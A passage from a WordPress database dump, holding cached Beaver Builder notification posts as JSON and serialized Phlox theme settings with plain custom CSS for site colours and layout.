\\u2764\\ufe0f Beaver Builder!<br><\\/p>\\n\",\"protected\":false},\"template\":\"\",\"meta\":{\"om_disable_all_campaigns\":false,\"_fl_notification\":[\"https:\\/\\/www.wpbeaverbuilder.com\\/3-reasons-why-wordpress-agencies-love-beaver-builder\\/\"],\"_links_to\":\"\",\"_links_to_target\":\"\"},\"_links\":{\"self\":[{\"href\":\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-json\\/wp\\/v2\\/fl_notification\\/434899\"}],\"collection\":[{\"href\":\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-json\\/wp\\/v2\\/fl_notification\"}],\"about\":[{\"href\":\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-json\\/wp\\/v2\\/types\\/fl_notification\"}],\"wp:attachment\":[{\"href\":\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-json\\/wp\\/v2\\/media?parent=434899\"}],\"curies\":[{\"name\":\"wp\",\"href\":\"https:\\/\\/api.w.org\\/{rel}\",\"templated\":true}]}},{\"id\":430933,\"date\":\"2019-02-08T12:10:12\",\"date_gmt\":\"2019-02-08T20:10:12\",\"guid\":{\"rendered\":\"https:\\/\\/www.wpbeaverbuilder.com\\/?post_type=fl_notification&p=430933\"},\"modified\":\"2019-02-08T12:10:15\",\"modified_gmt\":\"2019-02-08T20:10:15\",\"slug\":\"winter-update-blocks-in-beaver-builder-future-plans-and-more\",\"status\":\"publish\",\"type\":\"fl_notification\",\"link\":\"https:\\/\\/www.wpbeaverbuilder.com\\/?fl_notification=winter-update-blocks-in-beaver-builder-future-plans-and-more\",\"title\":{\"rendered\":\"Winter Update \\u2013 Blocks in Beaver Builder, Future Plans, and More\"},\"content\":{\"rendered\":\"\\n<div class=\\\"wp-block-image\\\"><figure class=\\\"aligncenter\\\"><img loading=\\\"lazy\\\" width=\\\"318\\\" height=\\\"139\\\" src=\\\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-content\\/uploads\\/2019\\/02\\/winter-update-notification.jpg\\\" alt=\\\"\\\" class=\\\"wp-image-430941\\\" srcset=\\\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-content\\/uploads\\/2019\\/02\\/winter-update-notification.jpg 318w, https:\\/\\/www.wpbeaverbuilder.com\\/wp-content\\/uploads\\/2019\\/02\\/winter-update-notification-300x131.jpg 300w\\\" sizes=\\\"(max-width: 318px) 100vw, 318px\\\" \\/><\\/figure><\\/div>\\n\\n\\n\\n<p>Our latest update post is live. We have news about future plans for Beaver Builder and an upcoming module overhaul! Our plugs and footnotes section is well stocked this time around. We\'ve been jumping on a ton of podcasts recently talking about everything from the future of\\u00a0Beaver Builder to digital nomadism! Let\'s get into it\\u2026<\\/p>\\n\",\"protected\":false},\"template\":\"\",\"meta\":{\"om_disable_all_campaigns\":false,\"_fl_notification\":[\"https:\\/\\/www.wpbeaverbuilder.com\\/winter-update-blocks-future-plans-and-more\\/\"],\"_links_to\":\"\",\"_links_to_target\":\"\"},\"_links\":{\"self\":[{\"href\":\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-json\\/wp\\/v2\\/fl_notification\\/430933\"}],\"collection\":[{\"href\":\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-json\\/wp\\/v2\\/fl_notification\"}],\"about\":[{\"href\":\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-json\\/wp\\/v2\\/types\\/fl_notification\"}],\"wp:attachment\":[{\"href\":\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-json\\/wp\\/v2\\/media?parent=430933\"}],\"curies\":[{\"name\":\"wp\",\"href\":\"https:\\/\\/api.w.org\\/{rel}\",\"templated\":true}]}},{\"id\":423877,\"date\":\"2019-01-16T15:51:14\",\"date_gmt\":\"2019-01-16T23:51:14\",\"guid\":{\"rendered\":\"https:\\/\\/www.wpbeaverbuilder.com\\/?post_type=fl_notification&p=423877\"},\"modified\":\"2019-01-16T15:51:14\",\"modified_gmt\":\"2019-01-16T23:51:14\",\"slug\":\"difference-between-gutenberg-and-page-builders-like-beaver-builder-elementor-and-divi\",\"status\":\"publish\",\"type\":\"fl_notification\",\"link\":\"https:\\/\\/www.wpbeaverbuilder.com\\/?fl_notification=difference-between-gutenberg-and-page-builders-like-beaver-builder-elementor-and-divi\",\"title\":{\"rendered\":\"Difference between Gutenberg and Page Builders like Beaver Builder, Elementor, and Divi\"},\"content\":{\"rendered\":\"<p><img loading=\\\"lazy\\\" class=\\\"aligncenter size-full wp-image-423885\\\" src=\\\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-content\\/uploads\\/2019\\/01\\/gutenberg-vs-bb-notification.jpg\\\" alt=\\\"Difference between Gutenberg and Beaver Builder\\\" width=\\\"318\\\" height=\\\"139\\\" srcset=\\\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-content\\/uploads\\/2019\\/01\\/gutenberg-vs-bb-notification.jpg 318w, https:\\/\\/www.wpbeaverbuilder.com\\/wp-content\\/uploads\\/2019\\/01\\/gutenberg-vs-bb-notification-300x131.jpg 300w\\\" sizes=\\\"(max-width: 318px) 100vw, 318px\\\" \\/><\\/p>\\n<p>This question has been coming up a lot! In this post, we explain how page builders differ from Gutenberg and the best scenarios to understand when to use one or the other. This might be old news to\\u00a0Beaver Builder users like you, but if you have a client or a friend that is trying to grok the differences this is the post for them.<\\/p>\\n\",\"protected\":false},\"template\":\"\",\"meta\":{\"om_disable_all_campaigns\":false,\"_fl_notification\":[\"https:\\/\\/www.wpbeaverbuilder.com\\/difference-between-gutenberg-and-page-builders-like-beaver-builder-elementor-and-divi\\/\"],\"_links_to\":\"\",\"_links_to_target\":\"\"},\"_links\":{\"self\":[{\"href\":\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-json\\/wp\\/v2\\/fl_notification\\/423877\"}],\"collection\":[{\"href\":\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-json\\/wp\\/v2\\/fl_notification\"}],\"about\":[{\"href\":\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-json\\/wp\\/v2\\/types\\/fl_notification\"}],\"wp:attachment\":[{\"href\":\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-json\\/wp\\/v2\\/media?parent=423877\"}],\"curies\":[{\"name\":\"wp\",\"href\":\"https:\\/\\/api.w.org\\/{rel}\",\"templated\":true}]}},{\"id\":421774,\"date\":\"2019-01-09T10:34:00\",\"date_gmt\":\"2019-01-09T18:34:00\",\"guid\":{\"rendered\":\"https:\\/\\/www.wpbeaverbuilder.com\\/?post_type=fl_notification&p=421774\"},\"modified\":\"2019-01-09T10:34:00\",\"modified_gmt\":\"2019-01-09T18:34:00\",\"slug\":\"mental-health-stress-and-burnout-an-interview-with-dr-sherry-walling\",\"status\":\"publish\",\"type\":\"fl_notification\",\"link\":\"https:\\/\\/www.wpbeaverbuilder.com\\/?fl_notification=mental-health-stress-and-burnout-an-interview-with-dr-sherry-walling\",\"title\":{\"rendered\":\"Mental Health, Stress, and Burnout \\u2013 An interview with Dr. Sherry Walling\"},\"content\":{\"rendered\":\"<p><img loading=\\\"lazy\\\" class=\\\"aligncenter size-full wp-image-421777\\\" src=\\\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-content\\/uploads\\/2019\\/01\\/sherry-walling-notification.jpg\\\" alt=\\\"Mental health, stress, and burnout\\\" width=\\\"318\\\" height=\\\"139\\\" srcset=\\\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-content\\/uploads\\/2019\\/01\\/sherry-walling-notification.jpg 318w, https:\\/\\/www.wpbeaverbuilder.com\\/wp-content\\/uploads\\/2019\\/01\\/sherry-walling-notification-300x131.jpg 300w\\\" sizes=\\\"(max-width: 318px) 100vw, 318px\\\" \\/><\\/p>\\n<p>We met Dr. Sherry Walling several years ago at an event and were extremely impressed with her candid discussions about mental health in the entrepreneurial space. I am thrilled that she agreed to work with us on an interview-style blog post discussing some practical ways to improve one\'s mental and emotional wellbeing.<\\/p>\\n\",\"protected\":false},\"template\":\"\",\"meta\":{\"om_disable_all_campaigns\":false,\"_fl_notification\":[\"https:\\/\\/www.wpbeaverbuilder.com\\/mental-health-stress-and-burnout-an-interview-with-dr-sherry-walling\\/\"],\"_links_to\":\"\",\"_links_to_target\":\"\"},\"_links\":{\"self\":[{\"href\":\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-json\\/wp\\/v2\\/fl_notification\\/421774\"}],\"collection\":[{\"href\":\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-json\\/wp\\/v2\\/fl_notification\"}],\"about\":[{\"href\":\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-json\\/wp\\/v2\\/types\\/fl_notification\"}],\"wp:attachment\":[{\"href\":\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-json\\/wp\\/v2\\/media?parent=421774\"}],\"curies\":[{\"name\":\"wp\",\"href\":\"https:\\/\\/api.w.org\\/{rel}\",\"templated\":true}]}},{\"id\":416381,\"date\":\"2018-12-14T09:02:44\",\"date_gmt\":\"2018-12-14T17:02:44\",\"guid\":{\"rendered\":\"https:\\/\\/www.wpbeaverbuilder.com\\/?post_type=fl_notification&p=416381\"},\"modified\":\"2018-12-14T09:02:44\",\"modified_gmt\":\"2018-12-14T17:02:44\",\"slug\":\"thoughts-on-gutenberg-and-a-wordcamp-us-recap\",\"status\":\"publish\",\"type\":\"fl_notification\",\"link\":\"https:\\/\\/www.wpbeaverbuilder.com\\/?fl_notification=thoughts-on-gutenberg-and-a-wordcamp-us-recap\",\"title\":{\"rendered\":\"Thoughts on Gutenberg and a WordCamp US Recap\"},\"content\":{\"rendered\":\"<p><img loading=\\\"lazy\\\" class=\\\"aligncenter size-full wp-image-416382\\\" src=\\\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-content\\/uploads\\/2018\\/12\\/wcus-notification.jpg\\\" alt=\\\"\\\" width=\\\"318\\\" height=\\\"139\\\" srcset=\\\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-content\\/uploads\\/2018\\/12\\/wcus-notification.jpg 318w, https:\\/\\/www.wpbeaverbuilder.com\\/wp-content\\/uploads\\/2018\\/12\\/wcus-notification-300x131.jpg 300w\\\" sizes=\\\"(max-width: 318px) 100vw, 318px\\\" \\/><\\/p>\\n<p>A few of us from the Beaver Builder team had the opportunity to attend WordCamp US 2018 in Nashville, Tennessee, this week. I\'d like to try something new this year and write down a few thoughts about the event and share photos.<\\/p>\\n\",\"protected\":false},\"template\":\"\",\"meta\":{\"om_disable_all_campaigns\":false,\"_fl_notification\":[\"https:\\/\\/www.wpbeaverbuilder.com\\/thoughts-on-gutenberg-and-a-wordcamp-us-recap\\/\"],\"_links_to\":\"\",\"_links_to_target\":\"\"},\"_links\":{\"self\":[{\"href\":\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-json\\/wp\\/v2\\/fl_notification\\/416381\"}],\"collection\":[{\"href\":\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-json\\/wp\\/v2\\/fl_notification\"}],\"about\":[{\"href\":\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-json\\/wp\\/v2\\/types\\/fl_notification\"}],\"wp:attachment\":[{\"href\":\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-json\\/wp\\/v2\\/media?parent=416381\"}],\"curies\":[{\"name\":\"wp\",\"href\":\"https:\\/\\/api.w.org\\/{rel}\",\"templated\":true}]}},{\"id\":408945,\"date\":\"2018-11-23T15:19:24\",\"date_gmt\":\"2018-11-23T23:19:24\",\"guid\":{\"rendered\":\"https:\\/\\/www.wpbeaverbuilder.com\\/?post_type=fl_notification&p=408945\"},\"modified\":\"2018-11-23T15:20:13\",\"modified_gmt\":\"2018-11-23T23:20:13\",\"slug\":\"black-friday-cyber-monday-25-off-everything\",\"status\":\"publish\",\"type\":\"fl_notification\",\"link\":\"https:\\/\\/www.wpbeaverbuilder.com\\/?fl_notification=black-friday-cyber-monday-25-off-everything\",\"title\":{\"rendered\":\"Black Friday \\/ Cyber Monday \\u2013 25% Off Everything\"},\"content\":{\"rendered\":\"<p><img loading=\\\"lazy\\\" class=\\\"aligncenter size-full wp-image-408954\\\" src=\\\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-content\\/uploads\\/2018\\/11\\/black-friday-notification.jpg\\\" alt=\\\"\\\" width=\\\"318\\\" height=\\\"139\\\" srcset=\\\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-content\\/uploads\\/2018\\/11\\/black-friday-notification.jpg 318w, https:\\/\\/www.wpbeaverbuilder.com\\/wp-content\\/uploads\\/2018\\/11\\/black-friday-notification-300x131.jpg 300w\\\" sizes=\\\"(max-width: 318px) 100vw, 318px\\\" \\/><\\/p>\\n<p>Happy Turkey Week! We\'re excited to continue our tradition of offering up a major discount on\\u00a0Beaver Builder for Black Friday and Cyber Monday 2018. Don\'t miss out on this limited time offer.<\\/p>\\n\",\"protected\":false},\"template\":\"\",\"meta\":{\"om_disable_all_campaigns\":false,\"_fl_notification\":[\"https:\\/\\/www.wpbeaverbuilder.com\\/black-friday-cyber-monday-2018-25-off-everything\\/\"],\"_links_to\":\"\",\"_links_to_target\":\"\"},\"_links\":{\"self\":[{\"href\":\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-json\\/wp\\/v2\\/fl_notification\\/408945\"}],\"collection\":[{\"href\":\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-json\\/wp\\/v2\\/fl_notification\"}],\"about\":[{\"href\":\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-json\\/wp\\/v2\\/types\\/fl_notification\"}],\"wp:attachment\":[{\"href\":\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-json\\/wp\\/v2\\/media?parent=408945\"}],\"curies\":[{\"name\":\"wp\",\"href\":\"https:\\/\\/api.w.org\\/{rel}\",\"templated\":true}]}},{\"id\":404849,\"date\":\"2018-11-08T13:34:29\",\"date_gmt\":\"2018-11-08T21:34:29\",\"guid\":{\"rendered\":\"https:\\/\\/www.wpbeaverbuilder.com\\/?post_type=fl_notification&p=404849\"},\"modified\":\"2018-11-08T13:34:29\",\"modified_gmt\":\"2018-11-08T21:34:29\",\"slug\":\"autumn-update-addressing-all-the-elephants\",\"status\":\"publish\",\"type\":\"fl_notification\",\"link\":\"https:\\/\\/www.wpbeaverbuilder.com\\/?fl_notification=autumn-update-addressing-all-the-elephants\",\"title\":{\"rendered\":\"Autumn Update \\u2013 Addressing all the Elephants\"},\"content\":{\"rendered\":\"<p><img loading=\\\"lazy\\\" class=\\\"aligncenter size-full wp-image-404853\\\" src=\\\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-content\\/uploads\\/2018\\/11\\/autumn-update-notification.jpg\\\" alt=\\\"\\\" width=\\\"318\\\" height=\\\"139\\\" srcset=\\\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-content\\/uploads\\/2018\\/11\\/autumn-update-notification.jpg 318w, https:\\/\\/www.wpbeaverbuilder.com\\/wp-content\\/uploads\\/2018\\/11\\/autumn-update-notification-300x131.jpg 300w\\\" sizes=\\\"(max-width: 318px) 100vw, 318px\\\" \\/><\\/p>\\n<p>Why, hello there! It\'s an exciting time in the WordPress world with Gutenberg on the verge of going live. We have a bunch of exciting news to share and new features to announce. Find out more in our Autumn update.<\\/p>\\n\",\"protected\":false},\"template\":\"\",\"meta\":{\"om_disable_all_campaigns\":false,\"_fl_notification\":[\"https:\\/\\/www.wpbeaverbuilder.com\\/autumn-update-addressing-all-the-elephants\\/\"],\"_links_to\":\"\",\"_links_to_target\":\"\"},\"_links\":{\"self\":[{\"href\":\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-json\\/wp\\/v2\\/fl_notification\\/404849\"}],\"collection\":[{\"href\":\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-json\\/wp\\/v2\\/fl_notification\"}],\"about\":[{\"href\":\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-json\\/wp\\/v2\\/types\\/fl_notification\"}],\"wp:attachment\":[{\"href\":\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-json\\/wp\\/v2\\/media?parent=404849\"}],\"curies\":[{\"name\":\"wp\",\"href\":\"https:\\/\\/api.w.org\\/{rel}\",\"templated\":true}]}}]\";}','no'),
(101026,'theme_mods_phlox','a:30:{i:0;b:0;s:20:\"last_checked_version\";s:6:\"2.11.1\";s:23:\"are_auxin_caps_assigned\";i:1;s:12:\"initial_date\";s:19:\"2021-05-20 20:28:13\";s:20:\"initial_version_free\";s:6:\"2.7.10\";s:17:\"initial_date_free\";s:19:\"2021-05-20 20:28:13\";s:10:\"client_key\";s:42:\"=H1m4vXbxu0cZY9XDIla6c1ZJ29sRd2ajvvh9LoumG\";s:15:\"initial_version\";s:6:\"2.7.10\";s:24:\"auxin_capabilities_added\";i:1;s:18:\"nav_menu_locations\";a:0:{}s:13:\"custom_js_ver\";d:8.9;s:20:\"use_inline_custom_js\";b:0;s:14:\"custom_css_ver\";d:1.7;s:21:\"use_inline_custom_css\";b:0;s:26:\"auxin_wp_image_sizes_ratio\";i:1;s:35:\"auxin_permalink_portfolio_structure\";s:9:\"portfolio\";s:45:\"auxin_permalink_permalink_options_initialized\";i:1;s:37:\"auxin_permalink_pending_rewrite_rules\";i:0;s:12:\"font_subsets\";s:0:\"\";s:9:\"font_urls\";a:0:{}s:17:\"custom_css_string\";s:6638:\"/* header-logo-width \n=========================*/\n.aux-logo-header .aux-logo-anchor{ max-width:80px; }\n/* header-logo-max-height-type \n=========================*/\n.aux-logo-header .aux-logo-anchor > img { max-height:85px; }\n/* site-frame-background-color \n=========================*/\n@media screen and (min-width: 700px) { .aux-framed .aux-side-frames, body.aux-framed:after, .aux-framed .aux-side-frames:before, .aux-framed .aux-side-frames:after {background-color:#111111;}}\n/* sticky-header-color \n=========================*/\n.aux-elementor-header.aux-sticky .elementor-section-wrap > .elementor-section { background-color:rgb(0, 0, 0) !important; }\n/* site-header-container-scaled-height \n=========================*/\n.aux-top-sticky .site-header-section.aux-sticky .aux-fill .aux-menu-depth-0 > .aux-item-content, .aux-top-sticky .site-header-section.aux-sticky .aux-header-elements,.aux-elementor-header.aux-sticky .elementor-section-wrap > .elementor-section > .elementor-container { min-height:0px; }\n/* site-header-container-height \n=========================*/\n.site-header-section .aux-header-elements:not(.aux-vertical-menu-elements), .site-header-section .aux-fill .aux-menu-depth-0 > .aux-item-content { height:85px; }\n/* site-transparent-header-bgcolor \n=========================*/\n.site-header-section { background-color:#FFFFFF; }\n/* site-vertical-menu-background-color \n=========================*/\n.aux-vertical-menu-side { background-color:#FFF; }\n/* site-header-navigation-item-height \n=========================*/\n.site-header-section .aux-middle .aux-menu-depth-0 > .aux-item-content { height:60px; }\n/* site-mobile-header-toggle-button-color \n=========================*/\n.site-header-section .aux-header .aux-burger:before, .site-header-section .aux-header .aux-burger:after, .site-header-section .aux-header .aux-burger .mid-line { border-color:#3d3d3d; }\n/* site-menu-full-screen-background-color \n=========================*/\n#fs-menu-search:before { background-color:rgba(255, 255, 255, 0.95); }\n/* site-top-header-background-color \n=========================*/\n#top-header {background-color:#FFFFFF;}\n/* blog-post-share-button-icon-size \n=========================*/\n.single-post .aux-single-post-share span::before { font-size:10px; }\n/* post-title-bar-overlay-pattern-opacity \n=========================*/\n.single-post .aux-overlay-bg-hash::before { opacity:0.15; }\n/* page-title-bar-overlay-pattern-opacity \n=========================*/\n.page .aux-overlay-bg-hash::before { opacity:0.5; }\n/* subfooter-bar-layout-bg-color \n=========================*/\n.aux-subfooter-bar { background-color:#fafafa; }\n/* subfooter-bar-top-border-color \n=========================*/\n.aux-subfooter-bar { border-top:1px solid #EAEAEA; }\n/* subfooter-layout-bg-image-position \n=========================*/\n.aux-subfooter {background-position:center center;}\n/* subfooter-layout-bg-image-size \n=========================*/\n.aux-subfooter {background-size:cover;}\n/* subfooter-layout-bg-image-repeat \n=========================*/\n.aux-subfooter {background-repeat:no-repeat;}\n/* subfooter-top-border-color \n=========================*/\n.aux-subfooter { border-top:1px solid #EAEAEA; }\n/* site-footer-bg-color \n=========================*/\n.aux-site-footer {background-color:#1A1A1A;}\n/* footer-top-border-color \n=========================*/\n.aux-site-footer {border-top:1px solid #EAEAEA;}\n/* footer-top-border-width \n=========================*/\n.aux-site-footer { border-top-width:1px; }\n/* site-secondary-logo-max-height \n=========================*/\n.aux-logo-footer .aux-logo-anchor img { max-height:50px; }\n/* site-body-background-size \n=========================*/\nbody { background-size:cover; }\n/* site-body-background-repeat \n=========================*/\nbody { background-repeat:no-repeat; }\n/* site-body-background-position \n=========================*/\nbody { background-position:left top; }\n/* site-body-background-attach \n=========================*/\nbody { background-attachment:scroll; }\n/* site-body-background-color \n=========================*/\nbody { background-color:rgba(47, 79, 79, 0.97) }\n/* site-content-background-color \n=========================*/\n.aux-top-header, .aux-sticky-footer .page-title-section, .aux-sticky-footer #main, #inner-body {background-color:rgba(0, 0, 0, 0.97);}\n/* body-typography \n=========================*/\nbody{ color:rgb(255, 255, 255); } \nbody:hover{ color:rgba(255, 249, 249, 0.98); } \n/* general-heading-h1 \n=========================*/\nbody h1, body .aux-h1{ color:rgba(255, 255, 255, 0.98); } \n/* general-heading-h2 \n=========================*/\nbody h2, body .aux-h2{ color:rgba(255, 255, 255, 0.98); } \nbody h2, body .aux-h2:hover{ color:rgba(255, 255, 255, 0.98); } \n/* general-heading-h3 \n=========================*/\nbody h3, body .aux-h3{ color:rgba(255, 255, 255, 0.98); } \nbody h3, body .aux-h3:hover{ color:rgba(255, 255, 255, 0.98); } \n/* blog-page-title-typography \n=========================*/\n.blog .hentry .entry-title{ color:rgba(255, 255, 255, 0.98); } \n.blog .hentry .entry-title:hover{ color:rgba(255, 255, 255, 0.98); } \n/* blog-page-info-typography \n=========================*/\n.blog .aux-archive .aux-primary .hentry .entry-info{ color:rgba(255, 255, 255, 0.98); } \n.blog .aux-archive .aux-primary .hentry .entry-info:hover{ color:rgba(255, 255, 255, 0.98); } \n/* blog-page-info-terms-typography \n=========================*/\n.blog .aux-archive .aux-primary .hentry .entry-info a{ color:rgba(255, 255, 255, 0.98); } \n.blog .aux-archive .aux-primary .hentry .entry-info a:hover{ color:rgba(255, 255, 255, 0.98); } \n/* blog-page-content-typography \n=========================*/\n.blog .hentry .entry-content{ color:rgba(255, 255, 255, 0.98); } \n.blog .hentry .entry-content:hover{ color:rgba(255, 255, 255, 0.98); } \n/* site-featured-color-1 \n=========================*/\n:root {--auxin-featured-color-1: rgb(255, 255, 255);}\n/* site-featured-color-2 \n=========================*/\n:root {--auxin-featured-color-2: rgb(255, 255, 255);}\n/* site-featured-color-3 \n=========================*/\n:root {--auxin-featured-color-3: rgb(255, 255, 255);}\n/* site-featured-color-4 \n=========================*/\n:root {--auxin-featured-color-4: rgb(255, 255, 255);}\n/* site-featured-color-5 \n=========================*/\n:root {--auxin-featured-color-5: rgb(255, 255, 255);}\n/* site-featured-color-6 \n=========================*/\n:root {--auxin-featured-color-6: rgb(255, 255, 255);}\n/* site-featured-color-7 \n=========================*/\n:root {--auxin-featured-color-7: rgb(255, 255, 255);}\n/* site-featured-color-8 \n=========================*/\n:root {--auxin-featured-color-8: rgb(255, 255, 255);}\n\";s:16:\"custom_css_array\";a:47:{s:17:\"header_logo_width\";s:52:\".aux-logo-header .aux-logo-anchor{ max-width:80px; }\";s:27:\"header_logo_max_height_type\";s:60:\".aux-logo-header .aux-logo-anchor > img { max-height:85px; }\";s:27:\"site_frame_background_color\";s:192:\"@media screen and (min-width: 700px) { .aux-framed .aux-side-frames, body.aux-framed:after, .aux-framed .aux-side-frames:before, .aux-framed .aux-side-frames:after {background-color:#111111;}}\";s:19:\"sticky_header_color\";s:123:\".aux-elementor-header.aux-sticky .elementor-section-wrap > .elementor-section { background-color:rgb(0, 0, 0) !important; }\";s:35:\"site_header_container_scaled_height\";s:286:\".aux-top-sticky .site-header-section.aux-sticky .aux-fill .aux-menu-depth-0 > .aux-item-content, .aux-top-sticky .site-header-section.aux-sticky .aux-header-elements,.aux-elementor-header.aux-sticky .elementor-section-wrap > .elementor-section > .elementor-container { min-height:0px; }\";s:28:\"site_header_container_height\";s:161:\".site-header-section .aux-header-elements:not(.aux-vertical-menu-elements), .site-header-section .aux-fill .aux-menu-depth-0 > .aux-item-content { height:85px; }\";s:31:\"site_transparent_header_bgcolor\";s:50:\".site-header-section { background-color:#FFFFFF; }\";s:35:\"site_vertical_menu_background_color\";s:50:\".aux-vertical-menu-side { background-color:#FFF; }\";s:34:\"site_header_navigation_item_height\";s:87:\".site-header-section .aux-middle .aux-menu-depth-0 > .aux-item-content { height:60px; }\";s:38:\"site_mobile_header_toggle_button_color\";s:185:\".site-header-section .aux-header .aux-burger:before, .site-header-section .aux-header .aux-burger:after, .site-header-section .aux-header .aux-burger .mid-line { border-color:#3d3d3d; }\";s:38:\"site_menu_full_screen_background_color\";s:70:\"#fs-menu-search:before { background-color:rgba(255, 255, 255, 0.95); }\";s:32:\"site_top_header_background_color\";s:39:\"#top-header {background-color:#FFFFFF;}\";s:32:\"blog_post_share_button_icon_size\";s:68:\".single-post .aux-single-post-share span::before { font-size:10px; }\";s:38:\"post_title_bar_overlay_pattern_opacity\";s:59:\".single-post .aux-overlay-bg-hash::before { opacity:0.15; }\";s:38:\"page_title_bar_overlay_pattern_opacity\";s:51:\".page .aux-overlay-bg-hash::before { opacity:0.5; }\";s:29:\"subfooter_bar_layout_bg_color\";s:48:\".aux-subfooter-bar { background-color:#fafafa; }\";s:30:\"subfooter_bar_top_border_color\";s:52:\".aux-subfooter-bar { border-top:1px solid #EAEAEA; }\";s:34:\"subfooter_layout_bg_image_position\";s:51:\".aux-subfooter {background-position:center center;}\";s:30:\"subfooter_layout_bg_image_size\";s:39:\".aux-subfooter {background-size:cover;}\";s:32:\"subfooter_layout_bg_image_repeat\";s:45:\".aux-subfooter {background-repeat:no-repeat;}\";s:26:\"subfooter_top_border_color\";s:48:\".aux-subfooter { border-top:1px solid #EAEAEA; }\";s:20:\"site_footer_bg_color\";s:44:\".aux-site-footer {background-color:#1A1A1A;}\";s:23:\"footer_top_border_color\";s:48:\".aux-site-footer {border-top:1px solid #EAEAEA;}\";s:23:\"footer_top_border_width\";s:42:\".aux-site-footer { border-top-width:1px; }\";s:30:\"site_secondary_logo_max_height\";s:58:\".aux-logo-footer .aux-logo-anchor img { max-height:50px; }\";s:25:\"site_body_background_size\";s:31:\"body { background-size:cover; }\";s:27:\"site_body_background_repeat\";s:37:\"body { background-repeat:no-repeat; }\";s:29:\"site_body_background_position\";s:38:\"body { background-position:left top; }\";s:27:\"site_body_background_attach\";s:38:\"body { background-attachment:scroll; }\";s:26:\"site_body_background_color\";s:48:\"body { background-color:rgba(47, 79, 79, 0.97) }\";s:29:\"site_content_background_color\";s:134:\".aux-top-header, .aux-sticky-footer .page-title-section, .aux-sticky-footer #main, #inner-body {background-color:rgba(0, 0, 0, 0.97);}\";s:15:\"body_typography\";s:82:\"body{ color:rgb(255, 255, 255); } \nbody:hover{ color:rgba(255, 249, 249, 0.98); } \";s:18:\"general_heading_h1\";s:58:\"body h1, body .aux-h1{ color:rgba(255, 255, 255, 0.98); } \";s:18:\"general_heading_h2\";s:123:\"body h2, body .aux-h2{ color:rgba(255, 255, 255, 0.98); } \nbody h2, body .aux-h2:hover{ color:rgba(255, 255, 255, 0.98); } \";s:18:\"general_heading_h3\";s:123:\"body h3, body .aux-h3{ color:rgba(255, 255, 255, 0.98); } \nbody h3, body .aux-h3:hover{ color:rgba(255, 255, 255, 0.98); } \";s:26:\"blog_page_title_typography\";s:133:\".blog .hentry .entry-title{ color:rgba(255, 255, 255, 0.98); } \n.blog .hentry .entry-title:hover{ color:rgba(255, 255, 255, 0.98); } \";s:25:\"blog_page_info_typography\";s:183:\".blog .aux-archive .aux-primary .hentry .entry-info{ color:rgba(255, 255, 255, 0.98); } \n.blog .aux-archive .aux-primary .hentry .entry-info:hover{ color:rgba(255, 255, 255, 0.98); } \";s:31:\"blog_page_info_terms_typography\";s:187:\".blog .aux-archive .aux-primary .hentry .entry-info a{ color:rgba(255, 255, 255, 0.98); } \n.blog .aux-archive .aux-primary .hentry .entry-info a:hover{ color:rgba(255, 255, 255, 0.98); } \";s:28:\"blog_page_content_typography\";s:137:\".blog .hentry .entry-content{ color:rgba(255, 255, 255, 0.98); } \n.blog .hentry .entry-content:hover{ color:rgba(255, 255, 255, 0.98); } \";s:21:\"site_featured_color_1\";s:53:\":root {--auxin-featured-color-1: rgb(255, 255, 255);}\";s:21:\"site_featured_color_2\";s:53:\":root {--auxin-featured-color-2: rgb(255, 255, 255);}\";s:21:\"site_featured_color_3\";s:53:\":root {--auxin-featured-color-3: rgb(255, 255, 255);}\";s:21:\"site_featured_color_4\";s:53:\":root {--auxin-featured-color-4: rgb(255, 255, 255);}\";s:21:\"site_featured_color_5\";s:53:\":root {--auxin-featured-color-5: rgb(255, 255, 255);}\";s:21:\"site_featured_color_6\";s:53:\":root {--auxin-featured-color-6: rgb(255, 255, 255);}\";s:21:\"site_featured_color_7\";s:53:\":root {--auxin-featured-color-7: rgb(255, 255, 255);}\";s:21:\"site_featured_color_8\";s:53:\":root {--auxin-featured-color-8: rgb(255, 255, 